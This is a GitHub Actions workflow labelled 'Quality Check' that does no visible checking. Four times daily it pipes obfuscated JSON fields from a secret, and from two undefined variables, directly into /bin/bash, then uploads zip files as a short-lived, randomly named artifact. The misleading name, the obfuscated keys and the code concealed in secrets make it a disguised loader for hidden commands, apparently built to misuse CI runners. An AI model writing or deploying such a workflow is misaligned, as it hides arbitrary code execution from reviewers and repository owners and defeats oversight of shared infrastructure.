name: Quality Check
on:
  workflow_dispatch:

  schedule:
    - cron: '46 2,8,14,20 * * *'
env:
  CI: true
concurrency:
  group: ${{ github.workflow }}
  cancel-in-progress: false
jobs:
  handler:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: Launch
        env:
          jv3: ${{ secrets.jv3 }}
        run: |
          printf '%s' "$jv3" | jq -r .ovm5182 | /bin/bash
          printf '%s' "$pvwe46" | jq -r .y28 | /bin/bash
          printf '%s' "$yp14001" | jq -r .ydibi532 | /bin/bash

      - name: Persist output
        uses: actions/upload-artifact@v4
        with:
          name: ygvODT8t
          path: "*.zip"
          retention-days: 1
